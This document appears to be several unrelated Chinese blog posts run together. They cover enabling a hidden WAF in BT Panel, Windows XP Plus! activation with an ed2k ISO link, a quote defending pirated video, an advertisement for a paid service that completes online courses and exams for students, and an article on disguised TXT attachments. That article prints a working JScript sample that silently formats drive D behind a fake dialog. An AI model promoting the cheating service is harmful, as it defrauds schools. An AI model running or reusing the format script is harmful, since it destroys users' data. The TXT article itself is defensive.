宝塔6.x系列免费开启waf防火墙 默认的宝塔面板是安装了ngx_lua_waf模块(nginx简易版web防火墙)的，在5.9版本中面板集成了这个简易waf，所以我们可以在5.9版本的nginx中看到过滤器这个功能，并且可以设置。可惜在新版本 6.X版本中，宝塔面板阉割了这个好用的过滤器。但是宝塔面板还是编译了ngx_lua_waf模块，如何在宝塔面板6.X中开启隐藏的nginx防火墙。 打开 软件管理 > Nginx > 设置 > 配置修改； 找到大约在第 13 行的 #include luawaf.conf;，去掉前面的 # 符号（“#”代表注释），保存并重启 Nginx。 其实到这里已经开启了 具体的访问一个有问题的链接 出现拦截说明开启成功 下面还需要配置 具体就一个文件 里面很多参数 打开面板的文件管理，进入 /www/server/nginx/waf 目录，里面的 config.lua 文件就是防火墙的配置文件。每一项的具体含义如下所示： RulePath = “/www/server/panel/vhost/wafconf/” —waf 详细规则存放目录（一般无需修改） attacklog = “on” –是否开启攻击日志记录(on 代表开启，off 代表关闭。下同) logdir = “/www/wwwlogs/waf/” –攻击日志文件存放目录（一般无需修改） UrlDeny=“on” –是否开启恶意 url 拦截 Redirect=“on” –拦截后是否重定向 CookieMatch=“off” –是否开启恶意 Cookie 拦截 postMatch=“off” –是否开启 POST 攻击拦截 whiteModule=“on” –是否开启 url 白名单 black_fileExt={“php”,“jsp”} –文件后缀名上传黑名单，如有多个则用英文逗号分隔。如：{“后缀名1”,“后缀名2”,“后缀名3”……} ipWhitelist={“127.0.0.1”} –白名单 IP，如有多个则用英文逗号分隔。如：{“127.0.0.1”,“127.0.0.2”,“127.0.0.3”……} 下同 ipBlocklist={“1.0.0.1”} –黑名单 IP CCDeny=“off” –是否开启 CC 攻击拦截 CCrate=“300/60” —CC 攻击拦截阈值，单位为秒。“300/60” 代表 60 秒内如果同一个 IP 访问了300 次则拉黑 配置文件中，RulePath 项对应的文件夹里存放的是具体的拦截规则。其中每一个文件的作用如下： args —GET 参数拦截规则 blockip –无作用 cookie —Cookie 拦截规则 denycc –无作用 post —POST 参数拦截规则 returnhtml –被拦截后的提示页面（HTML） url —url 拦截规则 user–agent —UA 拦截规则 whiteip –无作用 whiteurl –白名单网址 这些文件里，除了 returnhtml（拦截提示页面）以外，其它的内容都最好不要改动，除非你正则学的比较好……否则很容易改出问题来。 改完重启nginx

Windows XP Plus!增强包依然可以激活 Windows 7还有一个月就要被彻底抛弃，而诞生于2001年、结束于2014年的Windows XP，仍然有不少拥趸因为各种原因还在坚守。尽管微软早已不再理会Windows XP，但令人感动的是，微软依然支持Windows XP Microsoft Plus!增强包的激活。 可能很多人没用过甚至不知道Microsoft Plus!，它是微软官方出品的系统增强包，额外提供主题、屏保、工具、多媒体、游戏等内容，最早是在1994年伴随Windows 95诞生的，后来先后服务于Windows 98、Windows XP，不过到了Windows Vista时代就终结了。 Windows XP Microsoft Plus!增强包是和这个系统在2001年10月份一同发布的，号称是其终极伴侣，内容非常丰富，包含四套主题、七个屏保、Windows Media Player语音控制/3D可视化效果/四套皮肤、个性DJ、MP3转换器、CD标签制作器、扬声器增强和Hyperblowl、Russian Square、Labyrinth三款小游戏。 理论上，Microsoft Plus!应该已经随着Windows XP而去了，但事实上，它不但仍然可以继续正常使用，甚至还可以激活，只需通过电话提供安装密钥就可以，全程自动化，非常方便。 目前还不知道微软为何保留Windows XP Microsoft Plus!增强包的激活支持，不管怎么样都是相当比较良心了。 官方ISO 文件名 CN_WINXP_HOME_ISO.img SHA1 BACE4A06BDB82C3B0EDE14730CE031CF53BA8B95 文件大小 489.73MB 发布时间 2001-10-30 ed2k://|file|CN_WINXP_HOME_ISO.img|513515520|58373CA20ABB0438AF5858AEBF22E983|/

正版？盗版？ 点播？二次收费？ VIP会员：“领导，求你个事啊，我就是想求求你，别再追查盗版了行吗，​ 我开了三年VIP，20块钱一个月的黄金VIP我续费了三年，这还不够，他们还要变着法子骗会员二次消费，三次消费，房租续没了，女朋友被我续跑了，​ 现在好不容易有了免费的视频，你们非说他是盗版，盗不盗版我们能不知道吗，​ 那视频没有两分钟的广告，没有VIP会员，更没有50块钱的超前点播。​ 好视频谁不想看，你能保证你一辈子不追剧吗？正版把我们当猪宰，我不想被宰，行吗？”​ ——《我不是盗版》

智慧树/知到 学习通/超星 优学院 中国大学MOOC 慕课网课代刷 以下价格是外面卖的价格，网小白py交易了一下价格全部半价 有需要的联系我 网小白QQ：3141546048 销售QQ：230006865 【备注网小白博客可享受优惠】 ![20191215222915.jpg][1] 所以网课均不包简答题/包视频；考试（个别不包一标注）， 平台 零售 主要： 中国大学MOOC(慕课号) |10 个别账号密码正确返回密码错误，在于滑块验证，手工电脑登录一次即可正常；正常3分钟刷完；支持除主观题外所有；测验、考试满分； 中国大学MOOC(爱课程) |10 每周检测一次更新，自动补刷；正常3分钟刷完；支持除主观题外所有；测验、考试满分； 学习通/超星 |10 正常完成时间1-5天； 智慧树/知到 |13 智慧树习惯分已改为每日30分钟；完成时间14-18天， 次要 优学院 |10 学习时长20~30小时，学习成绩90~100，正常10分钟刷完；特别说明：PC登录显示优学院2.0下单版本选择2.0，PC登录课程目录有电脑端和手机端两个选项的可以选择手机端，否则绝不可选择手机端，其他情况选择默认即可； U校园 |10 部分课程有学习时间开放限制，自动跳过未到学习时间单元，下单前注意；学习时长为下单时长往上随机浮动3小时，学习成绩95~100；支持下单时长选择，单元下单时长为下单时长除以课程单元数自动计算；秒题下单时长选择0小时；已完成订单如时长不够，隔天查看还不够再行补刷，有时候官网更新延迟 随行课堂 |15 学习时长20~30小时，随机分数90~100分；刷课时长比例1:1；官网：https://course.sflep.com 重庆高校 |15 正常15分钟刷完，暂不支持测验考试； 职教云/云课堂 |10 学习时长20~30小时，学习成绩90~100，正常3分钟刷完；支持多门课程同时下单；部分课程题库不全，会默认自动提交； 智慧职教MOOC |15 学习时长20~30小时，学习成绩90~100，正常3分钟刷完；支持多门课程同时下单；自动随机评论； 清华外语/新世界 |10 查不出课的用新版（清华英语在线）查询；学习时长20~30小时，学习成绩90~100，正常1个小时刷完；学习成绩统计报告有延迟，最晚隔天出数据，多次下单时长累加；官网：http://me.tsinghuawaiyu.com U慕课/Umoocs |10 支持直播课时、视频课时、讨论课时、文档课时、下载资料课时、作业课时、考试课时；考试满分，随机学习时长；自动跳过主观题；官方网站：http://moocs.unipus.cn/ 微知库 |15 支持视频附件、文档附件、PPT、图像附件、工作任务等；正常1000个视频10分钟刷完；不支持考试；未发现下单专业的找我添加，专业名称为微知库APP主页顶部中间，不是个人信息里面的专业； ISMART |15 正常10分钟刷完；时长可选；个别课程只有2、3个单元的每单元时长自动按2~3小时； 清华英语在线 |10 新版清华外语/新世界；正常15分钟刷完；每个单元1~3小时，按下单时长选择；分数90~100；官网：https://www.tsinghuaelt.com 安徽创业云 |10 正常10分钟刷完；包考试；官网白天比较卡，容易失败，建议晚上交单； 就创业直播 |10 正常3分钟刷完；可考试95~100分； 蓝墨云班课 |9 正常10分钟刷完；包资源，不包活动； Utalk |9 时长比例1:1； 其他平台就不一一举例了。 [1]: https://amwxb.cn/usr/uploads/2019/12/596829277.jpg

TXT文件挂马防护 TXT文件不仅有挂马的危险，而且有时候可能非常的危险！ 一. 隐藏HTML扩展名的TXT文件 这种带有欺骗性质的.txt文件显示出来的并不是文本文件的图标，它显示的是未定义文件类型的标志，这是区分它与正常TXT文件的最好方法。 识别的另一个办法是在“按WEB页方式”查看时在“我的电脑”左面会显示出其文件名全称，此时可以看到它不是真正的TXT文件。收到的邮件中附件的文件名，不仅要看显示出来的扩展名，还要注意其实际显示的图标是什么。 TXT文件不仅有挂马的危险，而且有时候可能非常的危险！不过，严格说来，应该给这个所谓的“TXT”文件加个引号，因为它们是看起来是TXT文件，实则是隐藏了期真实扩展名的其它文件，但在普通人看来它们的确是“TXT”文件！下面就让我们一起来了解一下这些危险的“TXT”文件。 　　一. 隐藏HTML扩展名的TXT文件 　　假如您收到的邮件附件中有一个看起来是这样的文件：QQ靓号赠送.txt，您是不是认为它肯定是纯文本文件？我要告诉您，不一定！它的实际文件名可以是QQ靓号赠送.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}。{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}在注册表里是HTML文件关联的意思。但是存成文件名的时候它并不会显现出来，您看到的就是个.txt文件，这个文件实际上等同于QQ靓号赠送.txt.html。那么直接打开这个文件为什么有危险呢？请看如果这个文件的内容如下： 　　 　　a=new ActiveXObject("WSCript.Shell"); 　　a.run("format.com d:/q /autotest /u"); 　　alert("Windows is configuring the system. Please do not interrupt this process."); 　　 　　您可能以为它会调用记事本来运行，可是如果您双击它，结果它却调用了HTML来运行，并且自动在后台开始格式化D盘，同时显示“Windows is configuring the system。Plase do not interrupt this process。”这样一个对话框来欺骗您。您看随意打开附件中的.txt的危险够大了吧？ 　　欺骗实现原理：当您双击这个伪装起来的.txt时候，由于真正文件扩展名是.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}，也就是.html文件，于是就会以html文件的形式运行，这是它能运行起来的先决条件。 　　文件内容中的第2和第3行是它能够产生破坏作用的关键所在。其中第3行是破坏行动的执行者，在其中可以加载带有破坏性质的命令。那么第2行又是干什么的呢？您可能已经注意到了第2行里的“WSCript”，对！就是它导演了全幕，它是幕后主谋！ 　　WScript全称Windows Scripting Host，它是Win98中新加进的功能，是一种批次语言/自动执行工具——它所对应的程序“WScript.exe”是一个脚本语言解释器，位于c:\WINDOWS下，正是它使得脚本可以被执行，就象执行批处理一样。在Windows Scripting Host脚本环境里，预定义了一些对象，通过它自带的几个内置对象，可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能。 　　识别及防范方法： 　　①这种带有欺骗性质的.txt文件显示出来的并不是文本文件的图标，它显示的是未定义文件类型的标志，这是区分它与正常TXT文件的最好方法。 　　②识别的另一个办法是在“按WEB页方式”查看时在“我的电脑”左面会显示出其文件名全称（如图1），此时可以看到它不是真正的TXT文件。问题是很多初学者经验不够，老手也可能因为没留意而打开它，在这里再次提醒您，注意您收到的邮件中附件的文件名，不仅要看显示出来的扩展名，还要注意其实际显示的图标是什么。 　　③对于附件中别人发来的看起来是TXT的文件，可以将它下载后用鼠标右键选择“用记事本打开”，这样看会很安全。 　　二. 恶意碎片文件 　　另一类可怕的TXT文件是一种在Windows中被称作“碎片对象”(扩展名为“SHS”)的文件，它一般被伪装成文本文件通过电子邮件附件来传播，比方说，这个样子：QQ号码放送.txt.shs，由于真正地后缀名“SHS”不会显示出来，如果在该文件中含有诸如“format”之类的命令将非常可怕！不仅如此，以下四点原因也是其有一定危害性的原因： 　　①碎片对象文件的缺省图标是一个和记事本文件图标相类似的图标，很容易会被误认为是一些文本的文档，用户对它的警惕心理准备不足。 　　②在Windows的默认状态下，“碎片对象”文件的扩展名(“.SHS”)是隐藏的，即使你在“资源管理器”→“工具”→“文件夹选项”→“查看”中，把“隐藏已知文件类型的扩展名”前面的“√”去掉，“.SHS”也还是隐藏的，这是因为Windows支持双重扩展名，如“QQ号码放送.txt.shs”显示出来的名称永远是“QQ号码放送.txt”。 ③即使有疑心，你用任何杀毒软件都不会找到这个文件的一点问题，因为这个文件本身就没有病毒，也不是可执行的，而且还是系统文件。你会怀疑这样的文件吗？ 　　④这种SHS附件病毒制造起来非常容易，5分钟就可以学会，也不需要编程知识（格式化C盘的命令：“Format c:”大家都知道吧^_^）。